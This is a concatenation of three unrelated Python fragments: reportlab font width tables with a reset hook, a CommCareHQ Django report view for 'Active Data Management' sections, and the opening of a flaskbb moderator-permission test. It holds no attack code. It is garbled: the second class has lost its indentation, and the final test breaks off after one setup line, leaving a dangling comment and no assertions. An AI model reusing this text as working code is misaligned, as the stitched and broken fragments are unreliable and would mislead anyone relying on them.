'Lslash': 611,
'M': 889,
'N': 722,
'Ntilde': 722,
'O': 722,
'OE': 889,
'Oacute': 722,
'Ocircumflex': 722,
'Odieresis': 722,
'Ograve': 722,
'Oslash': 722,
'Otilde': 722,
'P': 556,
'Q': 722,
'R': 667,
'S': 556,
'Scaron': 556,
'T': 611,
'Thorn': 556,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 722,
'W': 944,
'X': 722,
'Y': 722,
'Yacute': 722,
'Ydieresis': 722,
'Z': 611,
'Zcaron': 611,
'a': 444,
'aacute': 444,
'acircumflex': 444,
'acute': 333,
'adieresis': 444,
'ae': 667,
'agrave': 444,
'ampersand': 778,
'aring': 444,
'asciicircum': 469,
'asciitilde': 541,
'asterisk': 500,
'at': 921,
'atilde': 444,
'b': 500,
'backslash': 278,
'bar': 200,
'braceleft': 480,
'braceright': 480,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 200,
'bullet': 350,
'c': 444,
'caron': 333,
'ccedilla': 444,
'cedilla': 333,
'cent': 500,
'circumflex': 333,
'colon': 278,
'comma': 250,
'copyright': 760,
'currency': 500,
'd': 500,
'dagger': 500,
'daggerdbl': 500,
'degree': 400,
'dieresis': 333,
'divide': 564,
'dollar': 500,
'dotaccent': 333,
'dotlessi': 278,
'e': 444,
'eacute': 444,
'ecircumflex': 444,
'edieresis': 444,
'egrave': 444,
'eight': 500,
'ellipsis': 1000,
'emdash': 1000,
'endash': 500,
'equal': 564,
'eth': 500,
'exclam': 333,
'exclamdown': 333,
'f': 333,
'fi': 556,
'five': 500,
'fl': 556,
'florin': 500,
'four': 500,
'fraction': 167,
'g': 500,
'germandbls': 500,
'grave': 333,
'greater': 564,
'guillemotleft': 500,
'guillemotright': 500,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 500,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 500,
'l': 278,
'less': 564,
'logicalnot': 564,
'lslash': 278,
'm': 778,
'macron': 333,
'minus': 564,
'mu': 500,
'multiply': 564,
'n': 500,
'nine': 500,
'ntilde': 500,
'numbersign': 500,
'o': 500,
'oacute': 500,
'ocircumflex': 500,
'odieresis': 500,
'oe': 722,
'ogonek': 333,
'ograve': 500,
'one': 500,
'onehalf': 750,
'onequarter': 750,
'onesuperior': 300,
'ordfeminine': 276,
'ordmasculine': 310,
'oslash': 500,
'otilde': 500,
'p': 500,
'paragraph': 453,
'parenleft': 333,
'parenright': 333,
'percent': 833,
'period': 250,
'periodcentered': 250,
'perthousand': 1000,
'plus': 564,
'plusminus': 564,
'q': 500,
'question': 444,
'questiondown': 444,
'quotedbl': 408,
'quotedblbase': 444,
'quotedblleft': 444,
'quotedblright': 444,
'quoteleft': 333,
'quoteright': 333,
'quotesinglbase': 333,
'quotesingle': 180,
'r': 333,
'registered': 760,
'ring': 333,
's': 389,
'scaron': 389,
'section': 500,
'semicolon': 278,
'seven': 500,
'six': 500,
'slash': 278,
'space': 250,
'sterling': 500,
't': 278,
'thorn': 500,
'three': 500,
'threequarters': 750,
'threesuperior': 300,
'tilde': 333,
'trademark': 980,
'two': 500,
'twosuperior': 300,
'u': 500,
'uacute': 500,
'ucircumflex': 500,
'udieresis': 500,
'ugrave': 500,
'underscore': 500,
'v': 500,
'w': 722,
'x': 500,
'y': 500,
'yacute': 500,
'ydieresis': 500,
'yen': 500,
'z': 444,
'zcaron': 444,
'zero': 500}
widthsByFontGlyph['Times-Bold'] = {'A': 722,
'AE': 1000,
'Aacute': 722,
'Acircumflex': 722,
'Adieresis': 722,
'Agrave': 722,
'Aring': 722,
'Atilde': 722,
'B': 667,
'C': 722,
'Ccedilla': 722,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 500,
'F': 611,
'G': 778,
'H': 778,
'I': 389,
'Iacute': 389,
'Icircumflex': 389,
'Idieresis': 389,
'Igrave': 389,
'J': 500,
'K': 778,
'L': 667,
'Lslash': 667,
'M': 944,
'N': 722,
'Ntilde': 722,
'O': 778,
'OE': 1000,
'Oacute': 778,
'Ocircumflex': 778,
'Odieresis': 778,
'Ograve': 778,
'Oslash': 778,
'Otilde': 778,
'P': 611,
'Q': 778,
'R': 722,
'S': 556,
'Scaron': 556,
'T': 667,
'Thorn': 611,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 722,
'W': 1000,
'X': 722,
'Y': 722,
'Yacute': 722,
'Ydieresis': 722,
'Z': 667,
'Zcaron': 667,
'a': 500,
'aacute': 500,
'acircumflex': 500,
'acute': 333,
'adieresis': 500,
'ae': 722,
'agrave': 500,
'ampersand': 833,
'aring': 500,
'asciicircum': 581,
'asciitilde': 520,
'asterisk': 500,
'at': 930,
'atilde': 500,
'b': 556,
'backslash': 278,
'bar': 220,
'braceleft': 394,
'braceright': 394,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 220,
'bullet': 350,
'c': 444,
'caron': 333,
'ccedilla': 444,
'cedilla': 333,
'cent': 500,
'circumflex': 333,
'colon': 333,
'comma': 250,
'copyright': 747,
'currency': 500,
'd': 556,
'dagger': 500,
'daggerdbl': 500,
'degree': 400,
'dieresis': 333,
'divide': 570,
'dollar': 500,
'dotaccent': 333,
'dotlessi': 278,
'e': 444,
'eacute': 444,
'ecircumflex': 444,
'edieresis': 444,
'egrave': 444,
'eight': 500,
'ellipsis': 1000,
'emdash': 1000,
'endash': 500,
'equal': 570,
'eth': 500,
'exclam': 333,
'exclamdown': 333,
'f': 333,
'fi': 556,
'five': 500,
'fl': 556,
'florin': 500,
'four': 500,
'fraction': 167,
'g': 500,
'germandbls': 556,
'grave': 333,
'greater': 570,
'guillemotleft': 500,
'guillemotright': 500,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 556,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 333,
'k': 556,
'l': 278,
'less': 570,
'logicalnot': 570,
'lslash': 278,
'm': 833,
'macron': 333,
'minus': 570,
'mu': 556,
'multiply': 570,
'n': 556,
'nine': 500,
'ntilde': 556,
'numbersign': 500,
'o': 500,
'oacute': 500,
'ocircumflex': 500,
'odieresis': 500,
'oe': 722,
'ogonek': 333,
'ograve': 500,
'one': 500,
'onehalf': 750,
'onequarter': 750,
'onesuperior': 300,
'ordfeminine': 300,
'ordmasculine': 330,
'oslash': 500,
'otilde': 500,
'p': 556,
'paragraph': 540,
'parenleft': 333,
'parenright': 333,
'percent': 1000,
'period': 250,
'periodcentered': 250,
'perthousand': 1000,
'plus': 570,
'plusminus': 570,
'q': 556,
'question': 500,
'questiondown': 500,
'quotedbl': 555,
'quotedblbase': 500,
'quotedblleft': 500,
'quotedblright': 500,
'quoteleft': 333,
'quoteright': 333,
'quotesinglbase': 333,
'quotesingle': 278,
'r': 444,
'registered': 747,
'ring': 333,
's': 389,
'scaron': 389,
'section': 500,
'semicolon': 333,
'seven': 500,
'six': 500,
'slash': 278,
'space': 250,
'sterling': 500,
't': 333,
'thorn': 556,
'three': 500,
'threequarters': 750,
'threesuperior': 300,
'tilde': 333,
'trademark': 1000,
'two': 500,
'twosuperior': 300,
'u': 556,
'uacute': 556,
'ucircumflex': 556,
'udieresis': 556,
'ugrave': 556,
'underscore': 500,
'v': 500,
'w': 722,
'x': 500,
'y': 500,
'yacute': 500,
'ydieresis': 500,
'yen': 500,
'z': 444,
'zcaron': 444,
'zero': 500}
widthsByFontGlyph['Times-Italic'] = {'A': 611,
'AE': 889,
'Aacute': 611,
'Acircumflex': 611,
'Adieresis': 611,
'Agrave': 611,
'Aring': 611,
'Atilde': 611,
'B': 611,
'C': 667,
'Ccedilla': 667,
'D': 722,
'E': 611,
'Eacute': 611,
'Ecircumflex': 611,
'Edieresis': 611,
'Egrave': 611,
'Eth': 722,
'Euro': 500,
'F': 611,
'G': 722,
'H': 722,
'I': 333,
'Iacute': 333,
'Icircumflex': 333,
'Idieresis': 333,
'Igrave': 333,
'J': 444,
'K': 667,
'L': 556,
'Lslash': 556,
'M': 833,
'N': 667,
'Ntilde': 667,
'O': 722,
'OE': 944,
'Oacute': 722,
'Ocircumflex': 722,
'Odieresis': 722,
'Ograve': 722,
'Oslash': 722,
'Otilde': 722,
'P': 611,
'Q': 722,
'R': 611,
'S': 500,
'Scaron': 500,
'T': 556,
'Thorn': 611,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 611,
'W': 833,
'X': 611,
'Y': 556,
'Yacute': 556,
'Ydieresis': 556,
'Z': 556,
'Zcaron': 556,
'a': 500,
'aacute': 500,
'acircumflex': 500,
'acute': 333,
'adieresis': 500,
'ae': 667,
'agrave': 500,
'ampersand': 778,
'aring': 500,
'asciicircum': 422,
'asciitilde': 541,
'asterisk': 500,
'at': 920,
'atilde': 500,
'b': 500,
'backslash': 278,
'bar': 275,
'braceleft': 400,
'braceright': 400,
'bracketleft': 389,
'bracketright': 389,
'breve': 333,
'brokenbar': 275,
'bullet': 350,
'c': 444,
'caron': 333,
'ccedilla': 444,
'cedilla': 333,
'cent': 500,
'circumflex': 333,
'colon': 333,
'comma': 250,
'copyright': 760,
'currency': 500,
'd': 500,
'dagger': 500,
'daggerdbl': 500,
'degree': 400,
'dieresis': 333,
'divide': 675,
'dollar': 500,
'dotaccent': 333,
'dotlessi': 278,
'e': 444,
'eacute': 444,
'ecircumflex': 444,
'edieresis': 444,
'egrave': 444,
'eight': 500,
'ellipsis': 889,
'emdash': 889,
'endash': 500,
'equal': 675,
'eth': 500,
'exclam': 333,
'exclamdown': 389,
'f': 278,
'fi': 500,
'five': 500,
'fl': 500,
'florin': 500,
'four': 500,
'fraction': 167,
'g': 500,
'germandbls': 500,
'grave': 333,
'greater': 675,
'guillemotleft': 500,
'guillemotright': 500,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 500,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 444,
'l': 278,
'less': 675,
'logicalnot': 675,
'lslash': 278,
'm': 722,
'macron': 333,
'minus': 675,
'mu': 500,
'multiply': 675,
'n': 500,
'nine': 500,
'ntilde': 500,
'numbersign': 500,
'o': 500,
'oacute': 500,
'ocircumflex': 500,
'odieresis': 500,
'oe': 667,
'ogonek': 333,
'ograve': 500,
'one': 500,
'onehalf': 750,
'onequarter': 750,
'onesuperior': 300,
'ordfeminine': 276,
'ordmasculine': 310,
'oslash': 500,
'otilde': 500,
'p': 500,
'paragraph': 523,
'parenleft': 333,
'parenright': 333,
'percent': 833,
'period': 250,
'periodcentered': 250,
'perthousand': 1000,
'plus': 675,
'plusminus': 675,
'q': 500,
'question': 500,
'questiondown': 500,
'quotedbl': 420,
'quotedblbase': 556,
'quotedblleft': 556,
'quotedblright': 556,
'quoteleft': 333,
'quoteright': 333,
'quotesinglbase': 333,
'quotesingle': 214,
'r': 389,
'registered': 760,
'ring': 333,
's': 389,
'scaron': 389,
'section': 500,
'semicolon': 333,
'seven': 500,
'six': 500,
'slash': 278,
'space': 250,
'sterling': 500,
't': 278,
'thorn': 500,
'three': 500,
'threequarters': 750,
'threesuperior': 300,
'tilde': 333,
'trademark': 980,
'two': 500,
'twosuperior': 300,
'u': 500,
'uacute': 500,
'ucircumflex': 500,
'udieresis': 500,
'ugrave': 500,
'underscore': 500,
'v': 444,
'w': 667,
'x': 444,
'y': 444,
'yacute': 444,
'ydieresis': 444,
'yen': 500,
'z': 389,
'zcaron': 389,
'zero': 500}
widthsByFontGlyph['Times-BoldItalic'] = {'A': 667,
'AE': 944,
'Aacute': 667,
'Acircumflex': 667,
'Adieresis': 667,
'Agrave': 667,
'Aring': 667,
'Atilde': 667,
'B': 667,
'C': 667,
'Ccedilla': 667,
'D': 722,
'E': 667,
'Eacute': 667,
'Ecircumflex': 667,
'Edieresis': 667,
'Egrave': 667,
'Eth': 722,
'Euro': 500,
'F': 667,
'G': 722,
'H': 778,
'I': 389,
'Iacute': 389,
'Icircumflex': 389,
'Idieresis': 389,
'Igrave': 389,
'J': 500,
'K': 667,
'L': 611,
'Lslash': 611,
'M': 889,
'N': 722,
'Ntilde': 722,
'O': 722,
'OE': 944,
'Oacute': 722,
'Ocircumflex': 722,
'Odieresis': 722,
'Ograve': 722,
'Oslash': 722,
'Otilde': 722,
'P': 611,
'Q': 722,
'R': 667,
'S': 556,
'Scaron': 556,
'T': 611,
'Thorn': 611,
'U': 722,
'Uacute': 722,
'Ucircumflex': 722,
'Udieresis': 722,
'Ugrave': 722,
'V': 667,
'W': 889,
'X': 667,
'Y': 611,
'Yacute': 611,
'Ydieresis': 611,
'Z': 611,
'Zcaron': 611,
'a': 500,
'aacute': 500,
'acircumflex': 500,
'acute': 333,
'adieresis': 500,
'ae': 722,
'agrave': 500,
'ampersand': 778,
'aring': 500,
'asciicircum': 570,
'asciitilde': 570,
'asterisk': 500,
'at': 832,
'atilde': 500,
'b': 500,
'backslash': 278,
'bar': 220,
'braceleft': 348,
'braceright': 348,
'bracketleft': 333,
'bracketright': 333,
'breve': 333,
'brokenbar': 220,
'bullet': 350,
'c': 444,
'caron': 333,
'ccedilla': 444,
'cedilla': 333,
'cent': 500,
'circumflex': 333,
'colon': 333,
'comma': 250,
'copyright': 747,
'currency': 500,
'd': 500,
'dagger': 500,
'daggerdbl': 500,
'degree': 400,
'dieresis': 333,
'divide': 570,
'dollar': 500,
'dotaccent': 333,
'dotlessi': 278,
'e': 444,
'eacute': 444,
'ecircumflex': 444,
'edieresis': 444,
'egrave': 444,
'eight': 500,
'ellipsis': 1000,
'emdash': 1000,
'endash': 500,
'equal': 570,
'eth': 500,
'exclam': 389,
'exclamdown': 389,
'f': 333,
'fi': 556,
'five': 500,
'fl': 556,
'florin': 500,
'four': 500,
'fraction': 167,
'g': 500,
'germandbls': 500,
'grave': 333,
'greater': 570,
'guillemotleft': 500,
'guillemotright': 500,
'guilsinglleft': 333,
'guilsinglright': 333,
'h': 556,
'hungarumlaut': 333,
'hyphen': 333,
'i': 278,
'iacute': 278,
'icircumflex': 278,
'idieresis': 278,
'igrave': 278,
'j': 278,
'k': 500,
'l': 278,
'less': 570,
'logicalnot': 606,
'lslash': 278,
'm': 778,
'macron': 333,
'minus': 606,
'mu': 576,
'multiply': 570,
'n': 556,
'nine': 500,
'ntilde': 556,
'numbersign': 500,
'o': 500,
'oacute': 500,
'ocircumflex': 500,
'odieresis': 500,
'oe': 722,
'ogonek': 333,
'ograve': 500,
'one': 500,
'onehalf': 750,
'onequarter': 750,
'onesuperior': 300,
'ordfeminine': 266,
'ordmasculine': 300,
'oslash': 500,
'otilde': 500,
'p': 500,
'paragraph': 500,
'parenleft': 333,
'parenright': 333,
'percent': 833,
'period': 250,
'periodcentered': 250,
'perthousand': 1000,
'plus': 570,
'plusminus': 570,
'q': 500,
'question': 500,
'questiondown': 500,
'quotedbl': 555,
'quotedblbase': 500,
'quotedblleft': 500,
'quotedblright': 500,
'quoteleft': 333,
'quoteright': 333,
'quotesinglbase': 333,
'quotesingle': 278,
'r': 389,
'registered': 747,
'ring': 333,
's': 389,
'scaron': 389,
'section': 500,
'semicolon': 333,
'seven': 500,
'six': 500,
'slash': 278,
'space': 250,
'sterling': 500,
't': 278,
'thorn': 500,
'three': 500,
'threequarters': 750,
'threesuperior': 300,
'tilde': 333,
'trademark': 1000,
'two': 500,
'twosuperior': 300,
'u': 556,
'uacute': 556,
'ucircumflex': 556,
'udieresis': 556,
'ugrave': 556,
'underscore': 500,
'v': 444,
'w': 667,
'x': 500,
'y': 444,
'yacute': 444,
'ydieresis': 444,
'yen': 500,
'z': 389,
'zcaron': 389,
'zero': 500}
widthsByFontGlyph['Symbol'] = {'Alpha': 722,
'Beta': 667,
'Chi': 722,
'Delta': 612,
'Epsilon': 611,
'Eta': 722,
'Euro': 750,
'Gamma': 603,
'Ifraktur': 686,
'Iota': 333,
'Kappa': 722,
'Lambda': 686,
'Mu': 889,
'Nu': 722,
'Omega': 768,
'Omicron': 722,
'Phi': 763,
'Pi': 768,
'Psi': 795,
'Rfraktur': 795,
'Rho': 556,
'Sigma': 592,
'Tau': 611,
'Theta': 741,
'Upsilon': 690,
'Upsilon1': 620,
'Xi': 645,
'Zeta': 611,
'aleph': 823,
'alpha': 631,
'ampersand': 778,
'angle': 768,
'angleleft': 329,
'angleright': 329,
'apple': 790,
'approxequal': 549,
'arrowboth': 1042,
'arrowdblboth': 1042,
'arrowdbldown': 603,
'arrowdblleft': 987,
'arrowdblright': 987,
'arrowdblup': 603,
'arrowdown': 603,
'arrowhorizex': 1000,
'arrowleft': 987,
'arrowright': 987,
'arrowup': 603,
'arrowvertex': 603,
'asteriskmath': 500,
'bar': 200,
'beta': 549,
'braceex': 494,
'braceleft': 480,
'braceleftbt': 494,
'braceleftmid': 494,
'bracelefttp': 494,
'braceright': 480,
'bracerightbt': 494,
'bracerightmid': 494,
'bracerighttp': 494,
'bracketleft': 333,
'bracketleftbt': 384,
'bracketleftex': 384,
'bracketlefttp': 384,
'bracketright': 333,
'bracketrightbt': 384,
'bracketrightex': 384,
'bracketrighttp': 384,
'bullet': 460,
'carriagereturn': 658,
'chi': 549,
'circlemultiply': 768,
'circleplus': 768,
'club': 753,
'colon': 278,
'comma': 250,
'congruent': 549,
'copyrightsans': 790,
'copyrightserif': 790,
'degree': 400,
'delta': 494,
'diamond': 753,
'divide': 549,
'dotmath': 250,
'eight': 500,
'element': 713,
'ellipsis': 1000,
'emptyset': 823,
'epsilon': 439,
'equal': 549,
'equivalence': 549,
'eta': 603,
'exclam': 333,
'existential': 549,
'five': 500,
'florin': 500,
'four': 500,
'fraction': 167,
'gamma': 411,
'gradient': 713,
'greater': 549,
'greaterequal': 549,
'heart': 753,
'infinity': 713,
'integral': 274,
'integralbt': 686,
'integralex': 686,
'integraltp': 686,
'intersection': 768,
'iota': 329,
'kappa': 549,
'lambda': 549,
'less': 549,
'lessequal': 549,
'logicaland': 603,
'logicalnot': 713,
'logicalor': 603,
'lozenge': 494,
'minus': 549,
'minute': 247,
'mu': 576,
'multiply': 549,
'nine': 500,
'notelement': 713,
'notequal': 549,
'notsubset': 713,
'nu': 521,
'numbersign': 500,
'omega': 686,
'omega1': 713,
'omicron': 549,
'one': 500,
'parenleft': 333,
'parenleftbt': 384,
'parenleftex': 384,
'parenlefttp': 384,
'parenright': 333,
'parenrightbt': 384,
'parenrightex': 384,
'parenrighttp': 384,
'partialdiff': 494,
'percent': 833,
'period': 250,
'perpendicular': 658,
'phi': 521,
'phi1': 603,
'pi': 549,
'plus': 549,
'plusminus': 549,
'product': 823,
'propersubset': 713,
'propersuperset': 713,
'proportional': 713,
'psi': 686,
'question': 444,
'radical': 549,
'radicalex': 500,
'reflexsubset': 713,
'reflexsuperset': 713,
'registersans': 790,
'registerserif': 790,
'rho': 549,
'second': 411,
'semicolon': 278,
'seven': 500,
'sigma': 603,
'sigma1': 439,
'similar': 549,
'six': 500,
'slash': 278,
'space': 250,
'spade': 753,
'suchthat': 439,
'summation': 713,
'tau': 439,
'therefore': 863,
'theta': 521,
'theta1': 631,
'three': 500,
'trademarksans': 786,
'trademarkserif': 890,
'two': 500,
'underscore': 500,
'union': 768,
'universal': 713,
'upsilon': 576,
'weierstrass': 987,
'xi': 493,
'zero': 500,
'zeta': 494}
widthsByFontGlyph['ZapfDingbats'] = {'a1': 974,
'a10': 692,
'a100': 668,
'a101': 732,
'a102': 544,
'a103': 544,
'a104': 910,
'a105': 911,
'a106': 667,
'a107': 760,
'a108': 760,
'a109': 626,
'a11': 960,
'a110': 694,
'a111': 595,
'a112': 776,
'a117': 690,
'a118': 791,
'a119': 790,
'a12': 939,
'a120': 788,
'a121': 788,
'a122': 788,
'a123': 788,
'a124': 788,
'a125': 788,
'a126': 788,
'a127': 788,
'a128': 788,
'a129': 788,
'a13': 549,
'a130': 788,
'a131': 788,
'a132': 788,
'a133': 788,
'a134': 788,
'a135': 788,
'a136': 788,
'a137': 788,
'a138': 788,
'a139': 788,
'a14': 855,
'a140': 788,
'a141': 788,
'a142': 788,
'a143': 788,
'a144': 788,
'a145': 788,
'a146': 788,
'a147': 788,
'a148': 788,
'a149': 788,
'a15': 911,
'a150': 788,
'a151': 788,
'a152': 788,
'a153': 788,
'a154': 788,
'a155': 788,
'a156': 788,
'a157': 788,
'a158': 788,
'a159': 788,
'a16': 933,
'a160': 894,
'a161': 838,
'a162': 924,
'a163': 1016,
'a164': 458,
'a165': 924,
'a166': 918,
'a167': 927,
'a168': 928,
'a169': 928,
'a17': 945,
'a170': 834,
'a171': 873,
'a172': 828,
'a173': 924,
'a174': 917,
'a175': 930,
'a176': 931,
'a177': 463,
'a178': 883,
'a179': 836,
'a18': 974,
'a180': 867,
'a181': 696,
'a182': 874,
'a183': 760,
'a184': 946,
'a185': 865,
'a186': 967,
'a187': 831,
'a188': 873,
'a189': 927,
'a19': 755,
'a190': 970,
'a191': 918,
'a192': 748,
'a193': 836,
'a194': 771,
'a195': 888,
'a196': 748,
'a197': 771,
'a198': 888,
'a199': 867,
'a2': 961,
'a20': 846,
'a200': 696,
'a201': 874,
'a202': 974,
'a203': 762,
'a204': 759,
'a205': 509,
'a206': 410,
'a21': 762,
'a22': 761,
'a23': 571,
'a24': 677,
'a25': 763,
'a26': 760,
'a27': 759,
'a28': 754,
'a29': 786,
'a3': 980,
'a30': 788,
'a31': 788,
'a32': 790,
'a33': 793,
'a34': 794,
'a35': 816,
'a36': 823,
'a37': 789,
'a38': 841,
'a39': 823,
'a4': 719,
'a40': 833,
'a41': 816,
'a42': 831,
'a43': 923,
'a44': 744,
'a45': 723,
'a46': 749,
'a47': 790,
'a48': 792,
'a49': 695,
'a5': 789,
'a50': 776,
'a51': 768,
'a52': 792,
'a53': 759,
'a54': 707,
'a55': 708,
'a56': 682,
'a57': 701,
'a58': 826,
'a59': 815,
'a6': 494,
'a60': 789,
'a61': 789,
'a62': 707,
'a63': 687,
'a64': 696,
'a65': 689,
'a66': 786,
'a67': 787,
'a68': 713,
'a69': 791,
'a7': 552,
'a70': 785,
'a71': 791,
'a72': 873,
'a73': 761,
'a74': 762,
'a75': 759,
'a76': 892,
'a77': 892,
'a78': 788,
'a79': 784,
'a8': 537,
'a81': 438,
'a82': 138,
'a83': 277,
'a84': 415,
'a85': 509,
'a86': 410,
'a87': 234,
'a88': 234,
'a89': 390,
'a9': 577,
'a90': 390,
'a91': 276,
'a92': 276,
'a93': 317,
'a94': 317,
'a95': 334,
'a96': 334,
'a97': 392,
'a98': 392,
'a99': 668,
'space': 278}
def _reset(
        initial_dicts=dict(
            ascent_descent=ascent_descent.copy(),
            fontsByBaseEnc=fontsByBaseEnc.copy(),
            fontsByName=fontsByName.copy(),
            standardFontAttributes=standardFontAttributes.copy(),
            widthVectorsByFont=widthVectorsByFont.copy(),
            widthsByFontGlyph=widthsByFontGlyph.copy(),
            )
        ):
    """Restore this module's font tables to their import-time contents.

    The mutable default argument is deliberate: it snapshots shallow copies
    of the tables exactly once, at import time, so every later call can
    restore the pristine state no matter how the live dicts were mutated.
    """
    for k, v in initial_dicts.items():  # .items(): works on Python 2 and 3 (iteritems() is Py2-only)
        d = globals()[k]
        d.clear()
        d.update(v)
# Hook _reset into reportlab's configuration-reset machinery, then remove the
# imported name so it does not linger in this module's public namespace.
from reportlab.rl_config import register_reset
register_reset(_reset)
del register_reset
|
import logging
from django.core.urlresolvers import reverse
from django.utils.safestring import mark_safe
from corehq.apps.adm.dispatcher import ADMSectionDispatcher
from corehq.apps.adm.models import REPORT_SECTION_OPTIONS, ADMReport
from corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn, DTSortType
from corehq.apps.reports.generic import GenericReportView, GenericTabularReport
from corehq.apps.reports.standard import DatespanMixin, ProjectReportParametersMixin
from dimagi.utils.decorators.memoized import memoized
from django.utils.translation import ugettext as _, ugettext_noop
class ADMSectionView(GenericReportView):
    """Base view for one section of the Active Data Management reports.

    Subclasses must set ``adm_slug`` to a key of ``REPORT_SECTION_OPTIONS``
    and implement the ``subreport_data`` property.
    """
    section_name = ugettext_noop("Active Data Management")
    base_template = "reports/base_template.html"
    dispatcher = ADMSectionDispatcher
    hide_filters = True
    emailable = True

    # adm-specific stuff
    adm_slug = None  # must be overridden with a valid ADM section slug

    def __init__(self, request, base_context=None, domain=None, **kwargs):
        self.adm_sections = dict(REPORT_SECTION_OPTIONS)
        # Fail fast if a subclass is misconfigured with an unknown slug.
        if self.adm_slug not in self.adm_sections:
            raise ValueError("The adm_slug provided, %s, is not in the list of valid ADM report section slugs: %s." %
                             (self.adm_slug, ", ".join([key for key, val in self.adm_sections.items()]))
            )
        self.subreport_slug = kwargs.get("subreport_slug")
        super(ADMSectionView, self).__init__(request, base_context, domain=domain, **kwargs)
        # Expose the active subreport slug to the template context.
        self.context['report'].update(sub_slug=self.subreport_slug)
        if self.subreport_data:
            # Title becomes "<subreport name> <section name>" (section in <small>).
            self.name = mark_safe("""%s <small>%s</small>""" %\
                (self.subreport_data.get('value', {}).get('name'),
                 self.adm_sections.get(self.adm_slug, _("ADM Report"))))

    @property
    def subreport_data(self):
        # Subclasses must return the data describing the active subreport.
        raise NotImplementedError

    @property
    def default_report_url(self):
        return reverse('default_adm_report', args=[self.request.project])

    @classmethod
    def get_url(cls, domain=None, render_as=None, **kwargs):
        # Append the subreport slug (if any) to the standard report URL.
        subreport = kwargs.get('subreport')
        url = super(ADMSectionView, cls).get_url(domain=domain, render_as=render_as, **kwargs)
        return "%s%s" % (url, "%s/" % subreport if subreport else "")
class DefaultReportADMSectionView(GenericTabularReport, ADMSectionView, ProjectReportParametersMixin, DatespanMixin):
section_name = ugettext_noop("Active Data Management")
base_template = "reports/base_template.html"
dispatcher = ADMSectionDispatcher
fix_left_col = True
fields = ['corehq.apps.reports.filters.users.UserTypeFilter',
'corehq.apps.reports.filters.select.GroupFilter',
'corehq.apps.reports.filters.dates.DatespanFilter']
hide_filters = False
# adm-specific stuff
adm_slug = None
@property
@memoized
def subreport_data(self):
default_subreport = ADMReport.get_default(self.subreport_slug, domain=self.domain,
section=self.adm_slug, wrap=False)
if default_subreport is None:
return dict()
return default_subreport
@property
@memoized
def adm_report(self):
if self.subreport_data:
try:
adm_report = ADMReport.get_correct_wrap(self.subreport_data.get('key')[-1])
adm_report.set_domain_specific_values(self.domain)
return adm_report
except Exception as e:
logging.error("Could not fetch ADM Report: %s" % e)
return None
@property
@memoized
def adm_columns(self):
if self.adm_report:
column_config = self.report_column_config
if not isinstance(column_config, dict):
ValueError('report_column_config should return a dict')
for col in self.adm_report.columns:
col.set_report_values(**column_config)
return self.adm_report.columns
return []
@property
def headers(self):
if self.subreport_slug is None:
raise ValueError("Cannot render this report. A subreport_slug is required.")
header = DataTablesHeader(DataTablesColumn(_("FLW Name")))
for col in self.adm_report.columns:
sort_type = DTSortType.NUMERIC if hasattr(col, 'returns_numerical') and col.returns_numerical else None
help_text = _(col.description) if col.description else None
header.add_column(DataTablesColumn(_(col.name), sort_type=sort_type, help_text=help_text))
header.custom_sort = self.adm_report.default_sort_params
return header
@property
def rows(self):
rows = []
for user in self.users:
row = [self.table_cell(user.raw_username,
user.username_in_report)]
for col in self.adm_columns:
val = col.raw_value(**user._asdict())
row.append(self.table_cell(col.clean_value(val),
col.html_value(val)))
rows.append(row)
self.statistics_rows = [["Total"], ["Average"]]
for ind, col in enumerate(self.adm_columns):
column_data = [row[1+ind] for row in rows]
self.statistics_rows[0].append(col.calculate_totals(column_data))
self.statistics_rows[1].append(col.calculate_averages(column_data))
return rows
@property
def report_column_config(self):
"""
Should return a dict of values important for rendering the ADMColumns in this report.
"""
return dict(
domain=self.domain,
datespan=self.datespan
)
@classmethod
def override_navigation_list(cls, context):
current_slug = context.get('report', {}).get('sub_slug')
domain = context.get('domain')
subreport_context = []
subreports = ADMReport.get_default_subreports(domain, cls.adm_slug)
if not subreports:
subreport_context.append({
'url': '#',
'warning_label': 'No ADM Reports Configured',
})
return subreport_context
for report in subreports:
key = report.get("key", [])
entry = report.get("value", {})
report_slug = key[-2]
if cls.show_subreport_in_navigation(report_slug):
subreport_context.append({
'is_active': current_slug == report_slug,
'url': cls.get_url(domain=domain, subreport=report_slug),
'description': entry.get('description', ''),
'title': entry.get('name', 'Untitled Report'),
})
return subreport_context
    @classmethod
    def show_subreport_in_navigation(cls, subreport_slug):
        # Hook for subclasses: return False to hide a given subreport from
        # the navigation list built by override_navigation_list().
        return True
|
"""
This test will use the default permissions found in
flaskbb.utils.populate
"""
from flaskbb.utils.permissions import *
def test_moderator_permissions_in_forum(
        forum, moderator_user, topic, topic_moderator):
    """Test the moderator permissions in a forum where the user is a
    moderator.
    """
    # Sanity check: the fixture user really is a moderator of this forum.
    assert moderator_user in forum.moderators
    # Basic posting rights.
    assert can_post_reply(moderator_user, forum)
    assert can_post_topic(moderator_user, forum)
    # Moderators may edit/delete content authored by other users.
    assert can_edit_post(moderator_user, topic.user_id, forum)
    assert can_moderate(moderator_user, forum)
    assert can_delete_post(moderator_user, topic.user_id, forum)
    assert can_delete_topic(moderator_user, topic.user_id, forum)
def test_moderator_permissions_without_forum(
        forum, moderator_user, topic, topic_moderator):
    """Test the moderator permissions in a forum where the user is not a
    moderator.
    """
    forum.moderators.remove(moderator_user)
    # Idiom fix: `x not in y` instead of `not x in y` (PEP 8 / E713).
